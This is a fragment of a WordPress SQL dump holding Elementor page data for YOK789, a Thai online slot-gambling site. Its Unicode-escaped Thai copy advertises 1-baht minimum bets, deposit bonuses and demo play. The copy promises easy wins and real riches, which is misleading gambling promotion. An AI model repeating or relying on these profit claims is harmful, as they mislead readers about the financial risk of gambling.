\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e40\\u0e15\\u0e34\\u0e21\\u0e01\\u0e47\\u0e40\\u0e02\\u0e49\\u0e32\\u0e44\\u0e1b\\u0e2a\\u0e31\\u0e21\\u0e1c\\u0e31\\u0e2a\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e40\\u0e01\\u0e21\\u0e44\\u0e14\\u0e49\\u0e04\\u0e23\\u0e1a\\u0e17\\u0e38\\u0e01\\u0e1f\\u0e35\\u0e40\\u0e08\\u0e2d\\u0e23\\u0e4c \\u0e08\\u0e30\\u0e25\\u0e2d\\u0e07\\u0e08\\u0e31\\u0e1a\\u0e08\\u0e31\\u0e07\\u0e2b\\u0e27\\u0e30\\u0e41\\u0e15\\u0e01 \\u0e14\\u0e39\\u0e23\\u0e2d\\u0e1a\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e40\\u0e17\\u0e2a\\u0e2a\\u0e44\\u0e15\\u0e25\\u0e4c\\u0e40\\u0e01\\u0e21\\u0e44\\u0e2b\\u0e19\\u0e40\\u0e2b\\u0e21\\u0e32\\u0e30\\u0e01\\u0e31\\u0e1a\\u0e15\\u0e31\\u0e27\\u0e40\\u0e2d\\u0e07\\u0e01\\u0e47\\u0e17\\u0e33\\u0e44\\u0e14\\u0e49\\u0e40\\u0e15\\u0e47\\u0e21\\u0e17\\u0e35\\u0e48 \\u0e04\\u0e27\\u0e32\\u0e21\\u0e14\\u0e35\\u0e07\\u0e32\\u0e21\\u0e04\\u0e37\\u0e2d\\u0e43\\u0e2b\\u0e49\\u0e1b\\u0e23\\u0e30\\u0e2a\\u0e1a\\u0e01\\u0e32\\u0e23\\u0e13\\u0e4c\\u0e40\\u0e2b\\u0e21\\u0e37\\u0e2d\\u0e19\\u0e40\\u0e25\\u0e48\\u0e19\\u0e40\\u0e07\\u0e34\\u0e19\\u0e08\\u0e23\\u0e34\\u0e07 \\u0e20\\u0e32\\u0e1e\\u0e25\\u0e37\\u0e48\\u0e19 \\u0e40\\u0e2d\\u0e1f\\u0e40\\u0e1f\\u0e01\\u0e15\\u0e4c\\u0e04\\u0e23\\u0e1a \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e27\\u0e32\\u0e07\\u0e41\\u0e1c\\u0e19\\u0e01\\u0e48\\u0e2d\\u0e19\\u0e25\\u0e07\\u0e2a\\u0e19\\u0e32\\u0e21\\u0e08\\u0e23\\u0e34\\u0e07\\u0e44\\u0e14\\u0e49\\u0e41\\u0e1a\\u0e1a\\u0e21\\u0e37\\u0e2d\\u0e42\\u0e1b\\u0e23 \\u0e43\\u0e04\\u0e23\\u0e2d\\u0e22\\u0e32\\u0e01\\u0e1d\\u0e36\\u0e01\\u0e2d\\u0e48\\u0e32\\u0e19\\u0e40\\u0e01\\u0e21\\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e2b\\u0e32\\u0e2a\\u0e39\\u0e15\\u0e23\\u0e1b\\u0e31\\u0e48\\u0e19\\u0e17\\u0e35\\u0e48\\u0e40\\u0e02\\u0e49\\u0e32\\u0e21\\u0e37\\u0e2d\\u0e2a\\u0e32\\u0e21\\u0e32\\u0e23\\u0e16\\u0e43\\u0e0a\\u0e49\\u0e42\\u0e2b\\u0e21\\u0e14\\u0e19\\u0e35\\u0e49\\u0e1b\\u0e31\\u0e49\\u0e19\\u0e04\\u0e27\\u0e32\\u0e21\\u0e21\\u0e31\\u0e48\\u0e19\\u0e43\\u0e08\\u0e44\\u0e14\\u0e49\\u0e2a\\u0e1a\\u0e32\\u0e22 \\u0e40\\u0e21\\u0e37\\u0e48\\u0e2d\\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e04\\u0e48\\u0e2d\\u0e22\\u0e2a\\u0e25\\u0e31\\u0e1a\\u0e21\\u0e32\\u0e40\\u0e25\\u0e48\\u0e19\\u0e08\\u0e23\\u0e34\\u0e07\\u0e01\\u0e47\\u0e40\\u0e14\\u0e34\\u0e19\\u0e40\\u0e01\\u0e21\\u0e44\\u0e14\\u0e49\\u0e40\\u0e09\\u0e35\\u0e22\\u0e1a\\u0e01\\u0e27\\u0e48\\u0e32\\u0e40\\u0e14\\u0e34\\u0e21 \\u0e40\\u0e1b\\u0e47\\u0e19\\u0e1e\\u0e37\\u0e49\\u0e19\\u0e17\\u0e35\\u0e48\\u0e43\\u0e2b\\u0e49\\u0e17\\u0e31\\u0e49\\u0e07\\u0e21\\u0e37\\u0e2d\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e41\\u0e25\\u0e30\\u0e2a\\u0e32\\u0e22\\u0e40\\u0e01\\u0e4b\\u0e32\\u0e44\\u0e14\\u0e49\\u0e1e\\u0e31\\u0e12\\u0e19\\u0e32\\u0e08\\u0e31\\u0e07\\u0e2b\\u0e27\\u0e30\\u0e15\\u0e31\\u0e27\\u0e40\\u0e2d\\u0e07\\u0e42\\u0e14\\u0e22\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e40\\u0e2a\\u0e35\\u0e48\\u0e22\\u0e07\\u0e17\\u0e38\\u0e19\\u0e15\\u0e31\\u0e49\\u0e07\\u0e41\\u0e15\\u0e48\\u0e23\\u0e2d\\u0e1a\\u0e41\\u0e23\\u0e01 \\u0e40\\u0e1b\\u0e34\\u0e14\\u0e17\\u0e32\\u0e07\\u0e2a\\u0e39\\u0e48\\u0e42\\u0e2d\\u0e01\\u0e32\\u0e2a\\u0e23\\u0e27\\u0e22\\u0e14\\u0e49\\u0e27\\u0e22\\u0e01\\u0e32\\u0e23\\u0e40\\u0e23\\u0e34\\u0e48\\u0e21\\u0e08\\u0e32\\u0e01\\u0e28\\u0e39\\u0e19\\u0e22\\u0e4c\\u0e41\\u0e1a\\u0e1a\\u0e21\\u0e35\\u0e0a\\u0e31\\u0e49\\u0e19\\u0e40\\u0e0a\\u0e34\\u0e07<\\/span><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(2400,329,'_thumbnail_id','273'),(2401,329,'_elementor_edit_mode','builder'),(2402,329,'_elementor_template_type','wp-page'),(2403,329,'_elementor_version','3.35.5'),(2404,329,'_elementor_pro_version','3.32.3'),(2405,329,'_wp_page_template','default'),(2406,329,'_elementor_page_settings','a:1:{s:10:\"hide_title\";s:3:\"yes\";}'),(2407,329,'_elementor_data','[{\"id\":\"e34294a\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"margin\":{\"unit\":\"px\",\"top\":\"10\",\"right\":0,\"bottom\":\"10\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"71011f2\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"e6e2e32\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2026\\/02\\/True-wallet-Yok789.webp\",\"id\":274,\"size\":\"\",\"alt\":\"YOK789\",\"source\":\"library\"},\"image_size\":\"full\",\"width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"image_box_shadow_box_shadow\":{\"horizontal\":-5,\"vertical\":5,\"blur\":10,\"spread\":5,\"color\":\"rgba(241.14765625, 7.867606108292297, 7.867606108292297, 0.5)\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"ac7884b\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"f319719\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2026\\/02\\/Slot-NO1-Yok789.webp\",\"id\":278,\"size\":\"\",\"alt\":\"Yok789\",\"source\":\"library\"},\"image_size\":\"full\",\"width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"image_box_shadow_box_shadow\":{\"horizontal\":5,\"vertical\":5,\"blur\":10,\"spread\":5,\"color\":\"rgba(241.14765625, 7.867606108292297, 7.867606108292297, 0.5)\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"6356635\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"8cd2aba\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"62ee80e\",\"elType\":\"widget\",\"settings\":{\"title\":\"YOK789 \\u0e40\\u0e27\\u0e47\\u0e1a\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e21\\u0e32\\u0e41\\u0e23\\u0e07 \\u0e40\\u0e25\\u0e48\\u0e19\\u0e41\\u0e15\\u0e01\\u0e07\\u0e48\\u0e32\\u0e22 \\u0e40\\u0e1a\\u0e17\\u0e02\\u0e31\\u0e49\\u0e19\\u0e15\\u0e48\\u0e33 1 \\u0e1a\\u0e32\\u0e17 \\u0e23\\u0e27\\u0e22\\u0e44\\u0e14\\u0e49\\u0e08\\u0e23\\u0e34\\u0e07\",\"header_size\":\"h1\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"474d65d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><a href=\\\"https:\\/\\/amb18b.com\\/\\\"><b>YOK789<\\/b><\\/a><span style=\\\"font-weight: 400;\\\"> \\u0e04\\u0e37\\u0e2d\\u0e08\\u0e31\\u0e07\\u0e2b\\u0e27\\u0e30\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e02\\u0e2d\\u0e07\\u0e2a\\u0e32\\u0e22\\u0e1b\\u0e31\\u0e48\\u0e19\\u0e17\\u0e35\\u0e48\\u0e2d\\u0e22\\u0e32\\u0e01\\u0e40\\u0e1b\\u0e25\\u0e35\\u0e48\\u0e22\\u0e19\\u0e40\\u0e27\\u0e25\\u0e32\\u0e27\\u0e48\\u0e32\\u0e07\\u0e43\\u0e2b\\u0e49\\u0e01\\u0e25\\u0e32\\u0e22\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e40\\u0e07\\u0e34\\u0e19\\u0e41\\u0e1a\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e04\\u0e34\\u0e14\\u0e40\\u0e22\\u0e2d\\u0e30 \\u0e40\\u0e27\\u0e47\\u0e1a\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e21\\u0e32\\u0e41\\u0e23\\u0e07\\u0e17\\u0e35\\u0e48\\u0e01\\u0e23\\u0e30\\u0e41\\u0e2a\\u0e01\\u0e33\\u0e25\\u0e31\\u0e07\\u0e1e\\u0e38\\u0e48\\u0e07\\u0e41\\u0e1a\\u0e1a\\u0e2b\\u0e22\\u0e38\\u0e14\\u0e44\\u0e21\\u0e48\\u0e2d\\u0e22\\u0e39\\u0e48 \\u0e08\\u0e38\\u0e14\\u0e40\\u0e14\\u0e48\\u0e19\\u0e2d\\u0e22\\u0e39\\u0e48\\u0e17\\u0e35\\u0e48\\u0e40\\u0e1a\\u0e17\\u0e02\\u0e31\\u0e49\\u0e19\\u0e15\\u0e48\\u0e33 1 \\u0e1a\\u0e32\\u0e17 \\u0e40\\u0e1b\\u0e34\\u0e14\\u0e17\\u0e32\\u0e07\\u0e43\\u0e2b\\u0e49\\u0e21\\u0e37\\u0e2d\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e25\\u0e2d\\u0e07\\u0e02\\u0e2d\\u0e07\\u0e44\\u0e14\\u0e49\\u0e2a\\u0e1a\\u0e32\\u0e22 \\u0e2a\\u0e48\\u0e27\\u0e19\\u0e2a\\u0e32\\u0e22\\u0e42\\u0e1b\\u0e23\\u0e01\\u0e47\\u0e44\\u0e25\\u0e48\\u0e25\\u0e48\\u0e32\\u0e01\\u0e33\\u0e44\\u0e23\\u0e44\\u0e14\\u0e49\\u0e40\\u0e15\\u0e47\\u0e21\\u0e2a\\u0e1b\\u0e35\\u0e14 \\u0e40\\u0e01\\u0e21\\u0e41\\u0e15\\u0e01\\u0e07\\u0e48\\u0e32\\u0e22\\u0e20\\u0e32\\u0e1e\\u0e2a\\u0e27\\u0e22\\u0e25\\u0e37\\u0e48\\u0e19\\u0e44\\u0e2b\\u0e25\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e40\\u0e2a\\u0e16\\u0e35\\u0e22\\u0e23\\u0e44\\u0e21\\u0e48\\u0e2a\\u0e30\\u0e14\\u0e38\\u0e14 \\u0e40\\u0e15\\u0e34\\u0e21\\u0e16\\u0e2d\\u0e19\\u0e40\\u0e23\\u0e47\\u0e27\\u0e17\\u0e31\\u0e19\\u0e43\\u0e08\\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e17\\u0e38\\u0e01\\u0e27\\u0e34\\u0e19\\u0e32\\u0e17\\u0e35\\u0e21\\u0e35\\u0e04\\u0e48\\u0e32 \\u0e1a\\u0e23\\u0e23\\u0e22\\u0e32\\u0e01\\u0e32\\u0e28\\u0e43\\u0e19\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e04\\u0e37\\u0e2d\\u0e04\\u0e27\\u0e32\\u0e21\\u0e04\\u0e36\\u0e01\\u0e04\\u0e31\\u0e01\\u0e1c\\u0e2a\\u0e21\\u0e04\\u0e27\\u0e32\\u0e21\\u0e21\\u0e31\\u0e48\\u0e19\\u0e43\\u0e08\\u0e27\\u0e48\\u0e32\\u0e40\\u0e25\\u0e48\\u0e19\\u0e41\\u0e25\\u0e49\\u0e27\\u0e21\\u0e35\\u0e25\\u0e38\\u0e49\\u0e19\\u0e08\\u0e23\\u0e34\\u0e07 \\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e17\\u0e38\\u0e19\\u0e2b\\u0e19\\u0e32\\u0e01\\u0e47\\u0e21\\u0e35\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c\\u0e1b\\u0e31\\u0e49\\u0e19\\u0e22\\u0e2d\\u0e14\\u0e43\\u0e2b\\u0e49\\u0e42\\u0e15\\u0e44\\u0e14\\u0e49\\u0e17\\u0e38\\u0e01\\u0e27\\u0e31\\u0e19 \\u0e43\\u0e04\\u0e23\\u0e01\\u0e33\\u0e25\\u0e31\\u0e07\\u0e21\\u0e2d\\u0e07\\u0e2b\\u0e32\\u0e1e\\u0e37\\u0e49\\u0e19\\u0e17\\u0e35\\u0e48\\u0e17\\u0e33\\u0e40\\u0e07\\u0e34\\u0e19\\u0e41\\u0e1a\\u0e1a\\u0e2a\\u0e19\\u0e38\\u0e01\\u0e41\\u0e25\\u0e30\\u0e17\\u0e49\\u0e32\\u0e17\\u0e32\\u0e22 \\u0e17\\u0e35\\u0e48\\u0e19\\u0e35\\u0e48\\u0e04\\u0e37\\u0e2d\\u0e2a\\u0e19\\u0e32\\u0e21\\u0e17\\u0e35\\u0e48\\u0e15\\u0e2d\\u0e1a\\u0e42\\u0e08\\u0e17\\u0e22\\u0e4c\\u0e17\\u0e31\\u0e49\\u0e07\\u0e04\\u0e27\\u0e32\\u0e21\\u0e21\\u0e31\\u0e19\\u0e41\\u0e25\\u0e30\\u0e42\\u0e2d\\u0e01\\u0e32\\u0e2a\\u0e23\\u0e27\\u0e22\\u0e43\\u0e19\\u0e17\\u0e35\\u0e48\\u0e40\\u0e14\\u0e35\\u0e22\\u0e27<\\/span><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"d34d1e8\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u0e04\\u0e27\\u0e32\\u0e21\\u0e19\\u0e48\\u0e32\\u0e2a\\u0e19\\u0e43\\u0e08\\u0e02\\u0e2d\\u0e07\\u0e01\\u0e32\\u0e23\\u0e2a\\u0e21\\u0e31\\u0e04\\u0e23 YOK789 \\u0e40\\u0e27\\u0e47\\u0e1a\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 \\u0e40\\u0e25\\u0e48\\u0e19\\u0e41\\u0e15\\u0e01\\u0e07\\u0e48\\u0e32\\u0e22 \",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"07fc632\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><span style=\\\"font-weight: 400;\\\">\\u0e04\\u0e27\\u0e32\\u0e21\\u0e1b\\u0e31\\u0e07\\u0e02\\u0e2d\\u0e07\\u0e17\\u0e35\\u0e48\\u0e19\\u0e35\\u0e48\\u0e44\\u0e21\\u0e48\\u0e44\\u0e14\\u0e49\\u0e21\\u0e35\\u0e41\\u0e04\\u0e48\\u0e40\\u0e01\\u0e21\\u0e41\\u0e15\\u0e01\\u0e07\\u0e48\\u0e32\\u0e22\\u0e41\\u0e15\\u0e48\\u0e40\\u0e23\\u0e34\\u0e48\\u0e21\\u0e15\\u0e31\\u0e49\\u0e07\\u0e41\\u0e15\\u0e48\\u0e02\\u0e31\\u0e49\\u0e19\\u0e15\\u0e2d\\u0e19\\u0e2a\\u0e21\\u0e31\\u0e04\\u0e23\\u0e17\\u0e35\\u0e48\\u0e42\\u0e04\\u0e15\\u0e23\\u0e44\\u0e27 \\u0e01\\u0e23\\u0e2d\\u0e01\\u0e02\\u0e49\\u0e2d\\u0e21\\u0e39\\u0e25\\u0e44\\u0e21\\u0e48\\u0e01\\u0e35\\u0e48\\u0e02\\u0e31\\u0e49\\u0e19\\u0e01\\u0e47\\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e25\\u0e38\\u0e22 \\u0e44\\u0e21\\u0e48\\u0e21\\u0e35\\u0e04\\u0e27\\u0e32\\u0e21\\u0e22\\u0e38\\u0e48\\u0e07\\u0e22\\u0e32\\u0e01\\u0e43\\u0e2b\\u0e49\\u0e40\\u0e2a\\u0e35\\u0e22\\u0e2d\\u0e32\\u0e23\\u0e21\\u0e13\\u0e4c \\u0e23\\u0e2d\\u0e07\\u0e23\\u0e31\\u0e1a\\u0e17\\u0e31\\u0e49\\u0e07\\u0e21\\u0e37\\u0e2d\\u0e16\\u0e37\\u0e2d\\u0e41\\u0e25\\u0e30\\u0e04\\u0e2d\\u0e21 \\u0e40\\u0e25\\u0e48\\u0e19\\u0e44\\u0e14\\u0e49\\u0e17\\u0e38\\u0e01\\u0e17\\u0e35\\u0e48\\u0e17\\u0e38\\u0e01\\u0e40\\u0e27\\u0e25\\u0e32 \\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e04\\u0e27\\u0e32\\u0e21\\u0e1b\\u0e25\\u0e2d\\u0e14\\u0e20\\u0e31\\u0e22\\u0e41\\u0e19\\u0e48\\u0e19\\u0e2b\\u0e19\\u0e32 \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e21\\u0e31\\u0e48\\u0e19\\u0e43\\u0e08\\u0e44\\u0e14\\u0e49\\u0e27\\u0e48\\u0e32\\u0e02\\u0e49\\u0e2d\\u0e21\\u0e39\\u0e25\\u0e41\\u0e25\\u0e30\\u0e18\\u0e38\\u0e23\\u0e01\\u0e23\\u0e23\\u0e21\\u0e16\\u0e39\\u0e01\\u0e14\\u0e39\\u0e41\\u0e25\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e14\\u0e35 \\u0e17\\u0e35\\u0e48\\u0e2a\\u0e33\\u0e04\\u0e31\\u0e0d\\u0e04\\u0e37\\u0e2d\\u0e21\\u0e35\\u0e17\\u0e35\\u0e21\\u0e14\\u0e39\\u0e41\\u0e25\\u0e15\\u0e25\\u0e2d\\u0e14\\u0e40\\u0e27\\u0e25\\u0e32 \\u0e04\\u0e2d\\u0e22\\u0e0b\\u0e31\\u0e1e\\u0e1e\\u0e2d\\u0e23\\u0e4c\\u0e15\\u0e40\\u0e21\\u0e37\\u0e48\\u0e2d\\u0e21\\u0e35\\u0e04\\u0e33\\u0e16\\u0e32\\u0e21\\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e1b\\u0e31\\u0e0d\\u0e2b\\u0e32\\u0e40\\u0e01\\u0e34\\u0e14\\u0e02\\u0e36\\u0e49\\u0e19 <\\/span><a href=\\\"https:\\/\\/luca333auto.com\\/\\\"><b>\\u0e40\\u0e02\\u0e49\\u0e32\\u0e2a\\u0e39\\u0e48\\u0e23\\u0e30\\u0e1a\\u0e1a<\\/b><\\/a><span style=\\\"font-weight: 400;\\\"> \\u0e17\\u0e35\\u0e48\\u0e19\\u0e35\\u0e48\\u0e08\\u0e38\\u0e14\\u0e41\\u0e02\\u0e47\\u0e07\\u0e2d\\u0e35\\u0e01\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e04\\u0e37\\u0e2d\\u0e01\\u0e32\\u0e23\\u0e2d\\u0e31\\u0e1b\\u0e40\\u0e14\\u0e15\\u0e40\\u0e01\\u0e21\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e2a\\u0e21\\u0e48\\u0e33\\u0e40\\u0e2a\\u0e21\\u0e2d \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e44\\u0e21\\u0e48\\u0e23\\u0e39\\u0e49\\u0e2a\\u0e36\\u0e01\\u0e08\\u0e33\\u0e40\\u0e08 \\u0e40\\u0e25\\u0e48\\u0e19\\u0e40\\u0e21\\u0e37\\u0e48\\u0e2d\\u0e44\\u0e23\\u0e01\\u0e47\\u0e21\\u0e35\\u0e2d\\u0e30\\u0e44\\u0e23\\u0e2a\\u0e14\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e43\\u0e2b\\u0e49\\u0e25\\u0e2d\\u0e07 \\u0e43\\u0e04\\u0e23\\u0e2d\\u0e22\\u0e32\\u0e01\\u0e40\\u0e1b\\u0e34\\u0e14\\u0e1b\\u0e23\\u0e30\\u0e2a\\u0e1a\\u0e01\\u0e32\\u0e23\\u0e13\\u0e4c\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e41\\u0e1a\\u0e1a\\u0e21\\u0e31\\u0e19\\u0e08\\u0e31\\u0e14\\u0e40\\u0e15\\u0e47\\u0e21\\u0e41\\u0e25\\u0e30\\u0e21\\u0e35\\u0e42\\u0e2d\\u0e01\\u0e32\\u0e2a\\u0e17\\u0e33\\u0e01\\u0e33\\u0e44\\u0e23\\u0e08\\u0e23\\u0e34\\u0e07 \\u0e01\\u0e32\\u0e23\\u0e2a\\u0e21\\u0e31\\u0e04\\u0e23\\u0e17\\u0e35\\u0e48\\u0e19\\u0e35\\u0e48\\u0e04\\u0e37\\u0e2d\\u0e01\\u0e49\\u0e32\\u0e27\\u0e41\\u0e23\\u0e01\\u0e2a\\u0e39\\u0e48\\u0e40\\u0e2a\\u0e49\\u0e19\\u0e17\\u0e32\\u0e07\\u0e2a\\u0e32\\u0e22\\u0e1b\\u0e31\\u0e48\\u0e19\\u0e17\\u0e35\\u0e48\\u0e44\\u0e21\\u0e48\\u0e18\\u0e23\\u0e23\\u0e21\\u0e14\\u0e32<\\/span><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"6b44269\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<ul><li><span style=\\\"color: #99cc00;\\\"><b>YOK789 <\\/b><\\/span><b><span style=\\\"color: #99cc00;\\\">\\u0e41\\u0e08\\u0e01\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e19\\u0e08\\u0e31\\u0e14\\u0e40\\u0e15\\u0e47\\u0e21<\\/span> <\\/b><\\/li><\\/ul><p><b><span style=\\\"font-weight: 400;\\\">\\u0e16\\u0e49\\u0e32\\u0e1e\\u0e39\\u0e14\\u0e16\\u0e36\\u0e07\\u0e04\\u0e27\\u0e32\\u0e21\\u0e04\\u0e38\\u0e49\\u0e21\\u0e17\\u0e35\\u0e48\\u0e08\\u0e31\\u0e1a\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e44\\u0e14\\u0e49 \\u0e40\\u0e27\\u0e47\\u0e1a\\u0e40\\u0e23\\u0e32\\u0e04\\u0e37\\u0e2d\\u0e2a\\u0e32\\u0e22\\u0e40\\u0e1b\\u0e22\\u0e4c\\u0e15\\u0e31\\u0e27\\u0e08\\u0e23\\u0e34\\u0e07 \\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e19\\u0e21\\u0e32\\u0e41\\u0e1a\\u0e1a\\u0e08\\u0e31\\u0e14\\u0e2b\\u0e19\\u0e31\\u0e01\\u0e08\\u0e31\\u0e14\\u0e40\\u0e15\\u0e47\\u0e21\\u0e44\\u0e21\\u0e48\\u0e21\\u0e35\\u0e01\\u0e31\\u0e4a\\u0e01 \\u0e17\\u0e31\\u0e49\\u0e07\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e2a\\u0e21\\u0e32\\u0e0a\\u0e34\\u0e01\\u0e43\\u0e2b\\u0e21\\u0e48 \\u0e42\\u0e1b\\u0e23\\u0e1d\\u0e32\\u0e01\\u0e23\\u0e32\\u0e22\\u0e27\\u0e31\\u0e19 \\u0e41\\u0e25\\u0e30\\u0e01\\u0e34\\u0e08\\u0e01\\u0e23\\u0e23\\u0e21\\u0e25\\u0e38\\u0e49\\u0e19\\u0e23\\u0e32\\u0e07\\u0e27\\u0e31\\u0e25\\u0e17\\u0e35\\u0e48\\u0e2a\\u0e25\\u0e31\\u0e1a\\u0e2b\\u0e21\\u0e38\\u0e19\\u0e40\\u0e27\\u0e35\\u0e22\\u0e19\\u0e43\\u0e2b\\u0e49\\u0e23\\u0e48\\u0e27\\u0e21\\u0e2a\\u0e19\\u0e38\\u0e01\\u0e15\\u0e25\\u0e2d\\u0e14 \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e17\\u0e38\\u0e01\\u0e01\\u0e32\\u0e23\\u0e40\\u0e15\\u0e34\\u0e21\\u0e40\\u0e07\\u0e34\\u0e19\\u0e21\\u0e35\\u0e1e\\u0e25\\u0e31\\u0e07\\u0e21\\u0e32\\u0e01\\u0e01\\u0e27\\u0e48\\u0e32\\u0e1b\\u0e01\\u0e15\\u0e34 \\u0e04\\u0e27\\u0e32\\u0e21\\u0e1e\\u0e35\\u0e04\\u0e2d\\u0e22\\u0e39\\u0e48\\u0e17\\u0e35\\u0e48\\u0e40\\u0e07\\u0e37\\u0e48\\u0e2d\\u0e19\\u0e44\\u0e02\\u0e40\\u0e02\\u0e49\\u0e32\\u0e43\\u0e08\\u0e07\\u0e48\\u0e32\\u0e22 \\u0e44\\u0e21\\u0e48\\u0e0b\\u0e31\\u0e1a\\u0e0b\\u0e49\\u0e2d\\u0e19 \\u0e23\\u0e31\\u0e1a\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c\\u0e44\\u0e27\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e23\\u0e2d\\u0e19\\u0e32\\u0e19 \\u0e41\\u0e04\\u0e48\\u0e01\\u0e14\\u0e23\\u0e31\\u0e1a\\u0e01\\u0e47\\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e25\\u0e38\\u0e22\\u0e15\\u0e48\\u0e2d\\u0e44\\u0e14\\u0e49\\u0e17\\u0e31\\u0e19\\u0e17\\u0e35 \\u0e1a\\u0e23\\u0e23\\u0e22\\u0e32\\u0e01\\u0e32\\u0e28\\u0e43\\u0e19\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e40\\u0e25\\u0e22\\u0e40\\u0e15\\u0e47\\u0e21\\u0e44\\u0e1b\\u0e14\\u0e49\\u0e27\\u0e22\\u0e04\\u0e27\\u0e32\\u0e21\\u0e15\\u0e37\\u0e48\\u0e19\\u0e40\\u0e15\\u0e49\\u0e19\\u0e40\\u0e2b\\u0e21\\u0e37\\u0e2d\\u0e19\\u0e21\\u0e35\\u0e1a\\u0e39\\u0e2a\\u0e15\\u0e4c\\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21\\u0e17\\u0e38\\u0e01\\u0e04\\u0e23\\u0e31\\u0e49\\u0e07\\u0e17\\u0e35\\u0e48\\u0e2b\\u0e21\\u0e38\\u0e19 \\u0e40\\u0e01\\u0e21\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e41\\u0e15\\u0e48\\u0e25\\u0e30\\u0e23\\u0e2d\\u0e1a\\u0e21\\u0e35\\u0e04\\u0e27\\u0e32\\u0e21\\u0e2b\\u0e27\\u0e31\\u0e07\\u0e21\\u0e32\\u0e01\\u0e02\\u0e36\\u0e49\\u0e19\\u0e40\\u0e1e\\u0e23\\u0e32\\u0e30\\u0e21\\u0e35\\u0e42\\u0e1b\\u0e23\\u0e0a\\u0e48\\u0e27\\u0e22\\u0e14\\u0e31\\u0e19 \\u0e43\\u0e04\\u0e23\\u0e0a\\u0e2d\\u0e1a\\u0e1f\\u0e35\\u0e25\\u0e40\\u0e25\\u0e48\\u0e19\\u0e41\\u0e25\\u0e49\\u0e27\\u0e44\\u0e14\\u0e49\\u0e01\\u0e33\\u0e44\\u0e23\\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21\\u0e41\\u0e1a\\u0e1a\\u0e40\\u0e19\\u0e35\\u0e22\\u0e19 \\u0e46 \\u0e17\\u0e35\\u0e48\\u0e19\\u0e35\\u0e48\\u0e15\\u0e2d\\u0e1a\\u0e42\\u0e08\\u0e17\\u0e22\\u0e4c\\u0e41\\u0e1a\\u0e1a\\u0e2a\\u0e38\\u0e14\\u0e17\\u0e32\\u0e07 